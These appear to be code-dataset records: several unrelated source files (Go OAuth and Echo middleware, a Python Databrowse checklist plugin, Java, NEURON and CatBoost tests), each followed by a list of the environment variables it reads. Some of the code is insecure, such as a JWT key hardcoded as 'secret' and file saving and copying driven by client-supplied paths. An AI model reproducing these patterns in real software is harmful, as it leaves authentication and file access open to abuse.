var LiquidDefaultValidationURL, _ = url.Parse(os.Getenv("OAUTH2_PROXY_PROFILE_URL"))
// NewLiquidProvider initiates a new LiquidProvider
func NewLiquidProvider(p *ProviderData) *LiquidProvider {
p.setProviderDefaults(providerDefaults{
name: LiquidProviderName,
loginURL: LiquidDefaultLoginURL,
redeemURL: LiquidDefaultRedeemURL,
profileURL: LiquidDefaultProfileURL,
validateURL: LiquidDefaultValidationURL,
scope: LiquidDefaultScope,
})
return &LiquidProvider{ProviderData: p}
}
// Instead of implementing GetEmailAddress and GetUserName (each with their own GET request...)
// we just copy/paste the Redeem method from provider_default and set all the SessionData fields
// there.
func (p *LiquidProvider) Redeem(ctx context.Context, redirectURL, code string) (s *sessions.SessionState, err error) {
if code == "" {
err = errors.New("missing code")
return
}
clientSecret, err := p.GetClientSecret()
if err != nil {
return
}
params := url.Values{}
params.Add("redirect_uri", redirectURL)
params.Add("client_id", p.ClientID)
params.Add("client_secret", clientSecret)
params.Add("code", code)
params.Add("grant_type", "authorization_code")
if p.ProtectedResource != nil && p.ProtectedResource.String() != "" {
params.Add("resource", p.ProtectedResource.String())
}
result := requests.New(p.RedeemURL.String()).
WithContext(ctx).
WithMethod("POST").
WithBody(bytes.NewBufferString(params.Encode())).
SetHeader("Content-Type", "application/x-www-form-urlencoded").
Do()
if result.Error() != nil {
return nil, result.Error()
}
// blindly try json and x-www-form-urlencoded
var jsonResponse struct {
AccessToken string `json:"access_token"`
}
err = result.UnmarshalInto(&jsonResponse)
if err == nil {
s = &sessions.SessionState{
AccessToken: jsonResponse.AccessToken,
}
err = p.populateSession(ctx, s)
return
}
var v url.Values
v, err = url.ParseQuery(string(result.Body()))
if err != nil {
return
}
if a := v.Get("access_token"); a != "" {
created := time.Now()
s = &sessions.SessionState{AccessToken: a, CreatedAt: &created}
err = p.populateSession(ctx, s)
} else {
err = fmt.Errorf("no access token found %s", result.Body())
}
return
}
// This sets up SessionState with the user data from our profile ID.
// The translation might be prettier with more annotated types,
// see the gitlab implementation.
func (p *LiquidProvider) populateSession(ctx context.Context, s *sessions.SessionState) error {
if s.AccessToken == "" {
return errors.New("missing access token")
}
json, err := requests.New(p.ProfileURL.String()).
WithContext(ctx).
WithHeaders(makeOIDCHeader(s.AccessToken)).
Do().
UnmarshalJSON()
if err != nil { return err }
s.User, err = json.GetPath("id").String()
if err != nil { return err }
log.Printf("LOGGING IN %s!\n", s.User)
// hypothesis user header hack
var liquidHeader bool
_, liquidHeader = os.LookupEnv("LIQUID_ENABLE_HYPOTHESIS_HEADERS")
if liquidHeader {
s.User = "acct:" + s.User + "@" + os.Getenv("LIQUID_DOMAIN")
}
s.Email, err = json.GetPath("email").String()
if err != nil { return err }
log.Printf("Email %s!\n", s.Email)
s.PreferredUsername, err = json.GetPath("name").String()
if err != nil { return err }
s.Groups, err = json.GetPath("roles").StringArray()
log.Printf("Groups %v!\n", s.Groups)
if err != nil { return err }
return nil
}
// ValidateSession validates the AccessToken
func (p *LiquidProvider) ValidateSession(ctx context.Context, s *sessions.SessionState) bool {
return validateToken(ctx, p, s.AccessToken, makeOIDCHeader(s.AccessToken))
}
| [
"\"LIQUID_HTTP_PROTOCOL\"",
"\"LIQUID_DOMAIN\"",
"\"OAUTH2_PROXY_PROFILE_URL\"",
"\"LIQUID_DOMAIN\""
] | [] | [
"LIQUID_HTTP_PROTOCOL",
"OAUTH2_PROXY_PROFILE_URL",
"LIQUID_DOMAIN"
] | [] | ["LIQUID_HTTP_PROTOCOL", "OAUTH2_PROXY_PROFILE_URL", "LIQUID_DOMAIN"] | go | 3 | 0 | |
databrowse/plugins/db_limatix_qautils_editor/db_limatix_qautils_editor.py | #!/usr/bin/env python
###############################################################################
## Databrowse: An Extensible Data Management Platform ##
## Copyright (C) 2012-2016 Iowa State University Research Foundation, Inc. ##
## All rights reserved. ##
## ##
## Redistribution and use in source and binary forms, with or without ##
## modification, are permitted provided that the following conditions are ##
## met: ##
## 1. Redistributions of source code must retain the above copyright ##
## notice, this list of conditions and the following disclaimer. ##
## 2. Redistributions in binary form must reproduce the above copyright ##
## notice, this list of conditions and the following disclaimer in the ##
## documentation and/or other materials provided with the distribution. ##
## 3. Neither the name of the copyright holder nor the names of its ##
## contributors may be used to endorse or promote products derived from ##
## this software without specific prior written permission. ##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ##
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED ##
## TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A ##
## PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER ##
## OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, ##
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, ##
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR ##
## PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF ##
## LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING ##
## NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS ##
## SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ##
## ##
## This material is based on work supported by the Air Force Research ##
## Laboratory under Contract #FA8650-10-D-5210, Task Order #023 and ##
## performed at Iowa State University. ##
## ##
## DISTRIBUTION A. Approved for public release: distribution unlimited; ##
## 19 Aug 2016; 88ABW-2016-4051. ##
## ##
## This material is based on work supported by NASA under Contract ##
## NNX16CL31C and performed by Iowa State University as a subcontractor ##
## to TRI Austin. ##
## ##
## Approved for public release by TRI Austin: distribution unlimited; ##
## 01 June 2018; by Carl W. Magnuson (NDE Division Director). ##
###############################################################################
""" plugins/renderers/db_checklist_chx.py - Generic Checklist Files """
import os
import os.path
from lxml import etree
from databrowse.support.renderer_support import renderer_class
import subprocess
import shutil
import sys
import imp
class db_limatix_qautils_editor(renderer_class):
""" Generic Checklist Files """
_namespace_uri = "http://limatix.org/databrowse/checklist"
_namespace_local = "checklist"
_default_content_mode = "full"
_default_style_mode = "fill_out_checklist"
_default_recursion_depth = 2
def getContent(self):
if self._caller != "databrowse":
return None
else:
if "ajax" in self._web_support.req.form and "save" in self._web_support.req.form and self._style_mode == "fill_out_checklist":
if "filename" in self._web_support.req.form and "destination" in self._web_support.req.form and "file" in self._web_support.req.form:
filename = self._web_support.req.form["filename"].value
destination = self._web_support.req.form["destination"].value
filestring = self._web_support.req.form["file"].value
if destination.startswith('/'):
fullpath = os.path.abspath(destination)
else:
fullpath = os.path.abspath(self._web_support.dataroot + "/" + destination)
fullfilename = os.path.abspath(fullpath + "/" + filename)
fullpath = os.path.dirname(fullfilename)
if filename == "":
self._web_support.req.output = "Error Saving File: Filename Cannot Be Blank"
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
if os.path.exists(fullfilename) and os.path.isdir(fullfilename):
self._web_support.req.output = "Error Saving File: Full Path '%s' is an Existing Directory" % fullfilename
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
if not fullpath.startswith(os.path.normpath(self._web_support.dataroot)):
self._web_support.req.output = "Error Saving File: Attempt to Save File Outside of Dataroot"
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
# Let's check on the directory and make sure its writable and it exists
if not os.access(fullpath, os.W_OK) and os.path.exists(fullpath):
self._web_support.req.output = "Error Saving File: Save Directory Not Writable " + fullpath
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
elif not os.path.exists(fullpath):
try:
os.makedirs(fullpath)
except:
self._web_support.req.output = "Error Saving File: Unable to Create Directory " + fullpath
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
pass
elif not os.path.isdir(fullpath):
self._web_support.req.output = "Error Saving File: Requested Save Directory is an Existing File " + fullpath
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
#Let's check on the file and make sure its writable and doesn't exist
if os.path.exists(fullfilename):
# rename old version into .1 .2. .3 etc.
filenum = 1
while os.path.exists("%s.%.2d" % (fullfilename, filenum)):
filenum += 1
pass
os.rename(fullfilename, "%s.%.2d" % (fullfilename, filenum))
pass
f = open(fullfilename, "wb")
f.write(filestring)
f.close
self._web_support.req.output = "File Saved Successfully"
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
else:
self._web_support.req.output = "Error Saving File: Incomplete Request"
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
elif "ajax" in self._web_support.req.form and "pdf" in self._web_support.req.form:
if all(k in self._web_support.req.form for k in ("file", "specimen", "perfby", "date", "dest")):
filestring = self._web_support.req.form["file"].value
if 'filename' in self._web_support.req.form:
upfilename = self._web_support.req.form["filename"].value
else:
upfilename = "chxfromweb.chx"
filename = os.path.splitext(upfilename)[0]
(filedir,filename_nodir)=os.path.split(filename)
tempsavedir = os.tempnam(None, "dbchx")
fullfilename = os.path.join(tempsavedir, filename_nodir + ".chx")
os.mkdir(tempsavedir)
os.chdir(tempsavedir)
chxparsed = etree.XML(filestring)
imagelist = chxparsed.xpath("//chx:checklist/chx:checkitem/chx:parameter[@name='image']", namespaces={"chx": "http://limatix.org/checklist"})
for image in imagelist:
if image.text is not None:
image = image.text
elif image.get('{http://www.w3.org/1999/xlink}href') is not None:
image = image.get('{http://www.w3.org/1999/xlink}href')
else:
continue
image = image.translate(None, "\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f")
image = image.strip()
if image.startswith('/'):
imagepath = image
else:
imagepath = os.path.abspath(os.path.dirname(self._fullpath) + '/' + image)
try:
shutil.copy(imagepath, tempsavedir)
except:
pass
f = open(fullfilename, "wb")
f.write(filestring)
f.close()
try:
os.environ["HOME"] = "/home/www/.home"
os.environ["PATH"] = os.environ["PATH"] + ':/usr/local/bin'
chx2pdf = imp.load_source("chx2pdf", os.path.join(self._web_support.limatix_qautils, "bin/chx2pdf"))
chx2pdf.chx2pdf(fullfilename)
except Exception as err:
self._web_support.req.output = "Error Generating PDF: " + str(err)
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
try:
f = open(os.path.join(tempsavedir, filename_nodir + ".pdf"), 'rb')
self._web_support.req.response_headers['Content-Type'] = 'application/pdf'
self._web_support.req.response_headers['Content-Length'] = str(self.getSize(os.path.join(tempsavedir, filename_nodir + ".pdf")))
self._web_support.req.response_headers['Content-Disposition'] = "attachment; filename=" + filename + ".pdf"
self._web_support.req.start_response(self._web_support.req.status, self._web_support.req.response_headers.items())
self._web_support.req.output_done = True
if 'wsgi.file_wrapper' in self._web_support.req.environ:
return self._web_support.req.environ['wsgi.file_wrapper'](f, 1024)
else:
return iter(lambda: f.read(1024), '')
except Exception as err:
self._web_support.req.output = "Error Generating PDF: " + err
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
else:
self._web_support.req.output = "Error Generating PDF: Incomplete Request"
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
elif "ajax" in self._web_support.req.form and "save" in self._web_support.req.form and self._style_mode == "edit_checklist":
if "file" in self._web_support.req.form:
filestring = self._web_support.req.form["file"].value
fullfilename = self._fullpath
# Let's check on the directory and make sure its writable and it exists
if not os.access(os.path.dirname(fullfilename), os.W_OK):
self._web_support.req.output = "Error Saving File: Save Directory Not Writable " + os.path.dirname(fullfilename)
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
elif not os.access(fullfilename, os.W_OK):
self._web_support.req.output = "Error Saving File: File Not Writable " + fullfilename
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
else:
#Let's check on the file and make sure its writable and doesn't exist
if os.path.exists(fullfilename):
# rename old version into .1 .2. .3 etc.
filenum = 1
while os.path.exists("%s.bak.%.2d" % (fullfilename, filenum)):
filenum += 1
pass
os.rename(fullfilename, "%s.bak.%.2d" % (fullfilename, filenum))
pass
f = open(fullfilename, "wb")
f.write(filestring)
f.close
self._web_support.req.output = "File Saved Successfully"
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
pass
else:
self._web_support.req.output = "Error Saving File: Incomplete Request"
self._web_support.req.response_headers['Content-Type'] = 'text/plain'
return [self._web_support.req.return_page()]
elif self._content_mode == "full" and self._style_mode == "fill_out_checklist":
#etree.register_namespace("chx", "http://limatix.org/checklist")
f = open(self._fullpath, 'r')
xml = etree.parse(f)
f.close()
g = open(os.path.join(self._web_support.limatix_qautils, 'checklist/chx2html.xsl'), 'r')
xsltransform = etree.parse(g)
g.close()
transform = etree.XSLT(xsltransform)
if "dest" in self._web_support.req.form:
transformedxml = transform(xml, dest=etree.XSLT.strparam(self._web_support.req.form['dest'].value))
else:
transformedxml = transform(xml)
xmloutput = etree.XML(str(transformedxml))
return xmloutput
elif self._content_mode == "full" and self._style_mode =="edit_checklist":
f = open(self._fullpath, 'r')
xml = etree.parse(f)
f.close()
xmlroot = xml.getroot()
templatefile = self.getURL("/SOPs/.src/checklist.xhtml", handler="db_default", content_mode="raw", ContentType="application/xml")
xmlroot.set("templatefile", templatefile)
return xmlroot
else:
raise self.RendererException("Invalid Content Mode")
pass
| [] | [] | [
"HOME",
"PATH"
] | [] | ["HOME", "PATH"] | python | 2 | 0 | |
thinkInJava4/src/main/java/enumerated/ConstantSpecificMethod.java | //: enumerated/ConstantSpecificMethod.java
import java.util.*;
import java.text.*;
public enum ConstantSpecificMethod {
DATE_TIME {
String getInfo() {
return
DateFormat.getDateInstance().format(new Date());
}
},
CLASSPATH {
String getInfo() {
return System.getenv("CLASSPATH");
}
},
VERSION {
String getInfo() {
return System.getProperty("java.version");
}
};
abstract String getInfo();
public static void main(String[] args) {
for(ConstantSpecificMethod csm : values())
System.out.println(csm.getInfo());
}
} /* (Execute to see output) *///:~
| [
"\"CLASSPATH\""
] | [] | [
"CLASSPATH"
] | [] | ["CLASSPATH"] | java | 1 | 0 | |
test/coreneuron/test_spikes.py | import os
import pytest
# Hacky, but it's non-trivial to pass commandline arguments to pytest tests.
mpi4py_option = bool(os.environ.get('NRN_TEST_SPIKES_MPI4PY', ''))
file_mode_option = bool(os.environ.get('NRN_TEST_SPIKES_FILE_MODE', ''))
nrnmpi_init_option = bool(os.environ.get('NRN_TEST_SPIKES_NRNMPI_INIT', ''))
def test_spikes(use_mpi4py=mpi4py_option, use_nrnmpi_init=nrnmpi_init_option,
file_mode=file_mode_option):
print("test_spikes(use_mpi4py={}, use_nrnmpi_init={}, file_mode={})".format(
use_mpi4py, use_nrnmpi_init, file_mode))
# mpi4py needs tp be imported before importing h
if use_mpi4py:
from mpi4py import MPI
from neuron import h, gui
# without mpi4py we need to call nrnmpi_init explicitly
elif use_nrnmpi_init:
from neuron import h, gui
h.nrnmpi_init()
# otherwise serial execution
else:
from neuron import h, gui
h('''create soma''')
h.soma.L = 5.6419
h.soma.diam = 5.6419
h.soma.insert("hh")
h.soma.nseg = 3
ic = h.IClamp(h.soma(.25))
ic.delay = .1
ic.dur = 0.1
ic.amp = 0.3
ic2 = h.IClamp(h.soma(.75))
ic2.delay = 5.5
ic2.dur = 1
ic2.amp = 0.3
h.tstop = 10
h.cvode.use_fast_imem(1)
h.cvode.cache_efficient(1)
pc = h.ParallelContext()
pc.set_gid2node(pc.id() + 1, pc.id())
myobj = h.NetCon(h.soma(0.5)._ref_v, None, sec=h.soma)
pc.cell(pc.id() + 1, myobj)
# NEURON run
nrn_spike_t = h.Vector()
nrn_spike_gids = h.Vector()
# rank 0 record spikes for all gid while others
# for specific gid. this is for better test coverage.
pc.spike_record(-1 if pc.id() == 0 else (pc.id() + 1), nrn_spike_t, nrn_spike_gids)
h.run()
nrn_spike_t = nrn_spike_t.to_python()
nrn_spike_gids = nrn_spike_gids.to_python()
# CORENEURON run
from neuron import coreneuron
coreneuron.enable = True
coreneuron.gpu = bool(os.environ.get('CORENRN_ENABLE_GPU', ''))
coreneuron.file_mode = file_mode
coreneuron.verbose = 0
h.stdinit()
corenrn_all_spike_t = h.Vector()
corenrn_all_spike_gids = h.Vector()
pc.spike_record(-1, corenrn_all_spike_t, corenrn_all_spike_gids)
pc.psolve(h.tstop)
corenrn_all_spike_t = corenrn_all_spike_t.to_python()
corenrn_all_spike_gids = corenrn_all_spike_gids.to_python()
# check spikes match
assert(len(nrn_spike_t)) # check we've actually got spikes
assert(len(nrn_spike_t) == len(nrn_spike_gids)) # matching no. of gids
assert(nrn_spike_t == corenrn_all_spike_t)
assert(nrn_spike_gids == corenrn_all_spike_gids)
h.quit()
if __name__ == "__main__":
test_spikes()
| [] | [] | [
"NRN_TEST_SPIKES_MPI4PY",
"NRN_TEST_SPIKES_FILE_MODE",
"CORENRN_ENABLE_GPU",
"NRN_TEST_SPIKES_NRNMPI_INIT"
] | [] | ["NRN_TEST_SPIKES_MPI4PY", "NRN_TEST_SPIKES_FILE_MODE", "CORENRN_ENABLE_GPU", "NRN_TEST_SPIKES_NRNMPI_INIT"] | python | 4 | 0 | |
lib-go/env.go | package aoc
import (
"os"
)
func DEBUG() bool {
return os.Getenv("AoC_DEBUG") != ""
}
| [
"\"AoC_DEBUG\""
] | [] | [
"AoC_DEBUG"
] | [] | ["AoC_DEBUG"] | go | 1 | 0 | |
catboost/pytest/lib/common_helpers.py | import csv
import json
import os
import random
import shutil
from copy import deepcopy
import numpy as np
__all__ = [
'DelayedTee',
'binary_path',
'compare_evals',
'compare_evals_with_precision',
'compare_metrics_with_diff',
'generate_random_labeled_set',
'permute_dataset_columns',
'remove_time_from_json',
'test_output_path',
]
try:
import yatest
binary_path = yatest.common.binary_path
test_output_path = yatest.common.test_output_path
except ImportError:
def binary_path(*path):
return os.path.join(os.environ["BINARY_PATH"], *path)
def test_output_path(*path):
return os.path.join(os.getcwd(), *path)
def remove_time_from_json(filename):
with open(filename) as f:
log = json.load(f)
iterations = log['iterations']
for i, iter_info in enumerate(iterations):
for key in ['remaining_time', 'passed_time']:
if key in iter_info.keys():
del iter_info[key]
with open(filename, 'w') as f:
json.dump(log, f, sort_keys=True)
return filename
# rewinds dst_stream to the start of the captured output so you can read it
class DelayedTee(object):
def __init__(self, src_stream, dst_stream):
self.src_stream = src_stream
self.dst_stream = dst_stream
def __enter__(self):
self.src_stream.flush()
self._old_src_stream = os.dup(self.src_stream.fileno())
self._old_dst_stream_pos = self.dst_stream.tell()
os.dup2(self.dst_stream.fileno(), self.src_stream.fileno())
def __exit__(self, exc_type, exc_value, traceback):
self.src_stream.flush()
os.dup2(self._old_src_stream, self.src_stream.fileno())
self.dst_stream.seek(self._old_dst_stream_pos)
shutil.copyfileobj(self.dst_stream, self.src_stream)
self.dst_stream.seek(self._old_dst_stream_pos)
def permute_dataset_columns(test_pool_path, cd_path, seed=123):
permuted_test_path = test_output_path('permuted_test')
permuted_cd_path = test_output_path('permuted_cd')
generator = random.Random(seed)
column_count = len(open(test_pool_path).readline().split('\t'))
permutation = list(range(column_count))
generator.shuffle(permutation)
with open(cd_path) as original_cd, open(permuted_cd_path, 'w') as permuted_cd:
for line in original_cd:
line = line.strip()
if not line:
continue
index, rest = line.split('\t', 1)
permuted_cd.write('{}\t{}\n'.format(permutation.index(int(index)), rest))
with open(test_pool_path) as test_pool, open(permuted_test_path, 'w') as permuted_test:
for line in test_pool:
splitted = line.strip().split('\t')
permuted_test.write('\t'.join([splitted[i] for i in permutation]) + '\n')
return permuted_test_path, permuted_cd_path
def generate_random_labeled_set(nrows, nvals, labels, seed=20181219, prng=None):
if prng is None:
prng = np.random.RandomState(seed=seed)
label = prng.choice(labels, [nrows, 1])
feature = prng.random_sample([nrows, nvals])
return np.concatenate([label, feature], axis=1)
BY_CLASS_METRICS = ['AUC', 'Precision', 'Recall', 'F1']
def compare_metrics_with_diff(custom_metric, fit_eval, calc_eval, eps=1e-7):
csv_fit = csv.reader(open(fit_eval, "r"), dialect='excel-tab')
csv_calc = csv.reader(open(calc_eval, "r"), dialect='excel-tab')
head_fit = next(csv_fit)
head_calc = next(csv_calc)
if isinstance(custom_metric, basestring):
custom_metric = [custom_metric]
for metric_name in deepcopy(custom_metric):
if metric_name in BY_CLASS_METRICS:
custom_metric.remove(metric_name)
for fit_metric_name in head_fit:
if fit_metric_name[:len(metric_name)] == metric_name:
custom_metric.append(fit_metric_name)
col_idx_fit = {}
col_idx_calc = {}
for metric_name in custom_metric:
col_idx_fit[metric_name] = head_fit.index(metric_name)
col_idx_calc[metric_name] = head_calc.index(metric_name)
while True:
try:
line_fit = next(csv_fit)
line_calc = next(csv_calc)
for metric_name in custom_metric:
fit_value = float(line_fit[col_idx_fit[metric_name]])
calc_value = float(line_calc[col_idx_calc[metric_name]])
max_abs = max(abs(fit_value), abs(calc_value))
err = abs(fit_value - calc_value) / max_abs if max_abs > 0 else 0
if err > eps:
raise Exception('{}, iter {}: fit vs calc = {} vs {}, err = {} > eps = {}'.format(
metric_name, line_fit[0], fit_value, calc_value, err, eps))
except StopIteration:
break
def compare_evals(fit_eval, calc_eval):
csv_fit = csv.reader(open(fit_eval, "r"), dialect='excel-tab')
csv_calc = csv.reader(open(calc_eval, "r"), dialect='excel-tab')
while True:
try:
line_fit = next(csv_fit)
line_calc = next(csv_calc)
if line_fit[:-1] != line_calc:
return False
except StopIteration:
break
return True
def compare_evals_with_precision(fit_eval, calc_eval, rtol=1e-6, skip_last_column_in_fit=True):
array_fit = np.loadtxt(fit_eval, delimiter='\t', skiprows=1, ndmin=2)
array_calc = np.loadtxt(calc_eval, delimiter='\t', skiprows=1, ndmin=2)
header_fit = open(fit_eval, "r").readline().split()
header_calc = open(calc_eval, "r").readline().split()
if skip_last_column_in_fit:
array_fit = np.delete(array_fit, np.s_[-1], 1)
header_fit = header_fit[:-1]
if header_fit != header_calc:
return False
return np.all(np.isclose(array_fit, array_calc, rtol=rtol))
| [] | [] | [
"BINARY_PATH"
] | [] | ["BINARY_PATH"] | python | 1 | 0 | |
utils.go | package main
import (
"errors"
"fmt"
"os"
)
func panic_the_err(err error) {
if err != nil {
fmt.Fprintf(os.Stderr, "ERROR: %s\n", err)
os.Exit(1)
}
}
func ensure_directory(path string) {
if path == "" {
panic(errors.New("Can't ensure empty string as a directory!"))
}
err := os.MkdirAll(path, 0755)
panic_the_err(err)
}
func getRootPath() string {
home := os.Getenv("HOME")
rootPath := home + "/.credulous"
os.MkdirAll(rootPath, 0700)
return rootPath
}
| [
"\"HOME\""
] | [] | [
"HOME"
] | [] | ["HOME"] | go | 1 | 0 | |
api/middleware.go | package api
import (
"fmt"
"net/http"
"os"
"reflect"
"strings"
"github.com/bigokro/gruff-server/gruff"
"github.com/bigokro/gruff-server/support"
jwt "github.com/dgrijalva/jwt-go"
"github.com/jinzhu/gorm"
"github.com/labstack/echo"
uuid "github.com/satori/go.uuid"
)
var RW_DB_POOL *gorm.DB
const (
HeaderReferrerPolicy = "Referrer-Policy"
)
type securityMiddlewareOption func(*echo.Response)
func ReferrerPolicy(p string) securityMiddlewareOption {
return func(r *echo.Response) {
r.Header().Set(HeaderReferrerPolicy, p)
}
}
func Secure(headers ...securityMiddlewareOption) echo.MiddlewareFunc {
return func(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
res := c.Response()
for _, m := range headers {
m(res)
}
return next(c)
}
}
}
func DBMiddleware(db *gorm.DB) echo.MiddlewareFunc {
return func(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
c.Set("Database", db)
return next(c)
}
}
}
func InitializePayload(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
c.Set("Payload", make(map[string]interface{}))
c.Set("AppName", fmt.Sprintf("%s-%s", os.Getenv("GRUFF_NAME"), os.Getenv("GRUFF_ENV")))
c.Set("RequestID", uuid.NewV4().String())
c.Set("Method", c.Request().Method)
c.Set("Endpoint", fmt.Sprintf("%s %s", c.Request().Method, c.Request().URL.Path))
c.Set("Path", c.Request().URL.String())
return next(c)
}
}
func SettingHeaders(test bool) echo.MiddlewareFunc {
return func(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
if !test {
xGruff := c.Request().Header.Get("X-Gruff")
if xGruff != "Gruff" {
return echo.NewHTTPError(http.StatusUnauthorized)
}
}
return next(c)
}
}
}
func SessionUser(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
user := gruff.User{}
auth := strings.Split(c.Request().Header.Get("Authorization"), " ")
if len(auth) != 1 {
token, _ := jwt.ParseWithClaims(auth[1], &jwtCustomClaims{}, func(token *jwt.Token) (interface{}, error) {
return []byte("secret"), nil
})
if token.Valid {
if claims, ok := token.Claims.(*jwtCustomClaims); ok {
user.ID = claims.ID
user.Name = claims.Name
user.Email = claims.Email
user.Username = claims.Username
user.Image = claims.Image
user.Curator = claims.Curator
user.Admin = claims.Admin
} else {
user.ID = 0
}
} else {
user.ID = 0
}
} else {
user.ID = 0
}
c.Set("UserContext", user)
return next(c)
}
}
func DetermineType(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
var tType reflect.Type
var parentType reflect.Type
parts := PathParts(c.Path())
var pathType string
for i := 0; i < len(parts); i++ {
pathType = parts[i]
t := StringToType(pathType)
if t != nil {
if tType != nil {
parentType = tType
}
tType = t
}
}
c.Set("ParentType", parentType)
c.Set("Type", tType)
return next(c)
}
}
func AssociationFieldNameFromPath(c echo.Context) string {
var tType reflect.Type
if c.Get("Type") != nil {
tType = c.Get("Type").(reflect.Type)
}
path := c.Path()
parts := strings.Split(path, "/")
associationPath := ""
for _, part := range parts {
if StringToType(part) == tType {
associationPath = part
}
}
associationName := support.SnakeToCamel(associationPath)
return associationName
}
func PathParts(path string) []string {
parts := strings.Split(strings.Trim(path, " /"), "/")
return parts
}
func StringToType(typeName string) (t reflect.Type) {
switch typeName {
case "users":
var m gruff.User
t = reflect.TypeOf(m)
case "claims":
var m gruff.Claim
t = reflect.TypeOf(m)
case "claim_opinions":
var m gruff.ClaimOpinion
t = reflect.TypeOf(m)
case "arguments":
var m gruff.Argument
t = reflect.TypeOf(m)
case "argument_opinions":
var m gruff.ArgumentOpinion
t = reflect.TypeOf(m)
case "contexts":
var m gruff.Context
t = reflect.TypeOf(m)
case "links":
var m gruff.Link
t = reflect.TypeOf(m)
case "tags":
var m gruff.Tag
t = reflect.TypeOf(m)
case "values":
var m gruff.Value
t = reflect.TypeOf(m)
}
return
}
func ServerContext(c echo.Context) *gruff.ServerContext {
var tType reflect.Type
var ParentType reflect.Type
var user gruff.User
if c.Get("UserContext") != nil {
user = c.Get("UserContext").(gruff.User)
}
if c.Get("Type") != nil {
tType = c.Get("Type").(reflect.Type)
}
if c.Get("ParentType") != nil {
ParentType = c.Get("ParentType").(reflect.Type)
}
return &gruff.ServerContext{
RequestID: c.Get("RequestID").(string),
Database: c.Get("Database").(*gorm.DB),
UserContext: user,
Test: false,
Type: tType,
ParentType: ParentType,
Payload: make(map[string]interface{}),
}
}
// func (ctx *Context) ServerContext() gruff.ServerContext {
// return gruff.ServerContext{
// Database: ctx.Database,
// Test: false,
// }
// }
| [
"\"GRUFF_NAME\"",
"\"GRUFF_ENV\""
] | [] | [
"GRUFF_ENV",
"GRUFF_NAME"
] | [] | ["GRUFF_ENV", "GRUFF_NAME"] | go | 2 | 0 | |
server.go | package main
import (
"log"
"net/http"
"os"
"github.com/99designs/gqlgen/graphql/handler"
"github.com/99designs/gqlgen/graphql/playground"
"github.com/fashionscape/fsbot-api/graph"
"github.com/fashionscape/fsbot-api/graph/generated"
)
const defaultPort = "8080"
func main() {
port := os.Getenv("PORT")
if port == "" {
port = defaultPort
}
srv := handler.NewDefaultServer(generated.NewExecutableSchema(generated.Config{Resolvers: &graph.Resolver{}}))
http.Handle("/", playground.Handler("GraphQL playground", "/query"))
http.Handle("/query", srv)
log.Printf("connect to http://localhost:%s/ for GraphQL playground", port)
log.Fatal(http.ListenAndServe(":"+port, nil))
}
| [
"\"PORT\""
] | [] | [
"PORT"
] | [] | ["PORT"] | go | 1 | 0 | |
pkg/codegen/internal/test/helpers.go | // Copyright 2016-2021, Pulumi Corporation.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package test
import (
"bytes"
"encoding/json"
"errors"
"fmt"
"io"
"io/ioutil"
"net/http"
"os"
"path/filepath"
"sort"
"testing"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"gopkg.in/yaml.v3"
"github.com/pulumi/pulumi/pkg/v3/codegen/schema"
"github.com/pulumi/pulumi/pkg/v3/testing/integration"
"github.com/pulumi/pulumi/sdk/v3/go/common/util/executable"
)
// GenPkgSignature corresponds to the shape of the codegen GeneratePackage functions.
type GenPkgSignature func(string, *schema.Package, map[string][]byte) (map[string][]byte, error)
// GeneratePackageFilesFromSchema loads a schema and generates files using the provided GeneratePackage function.
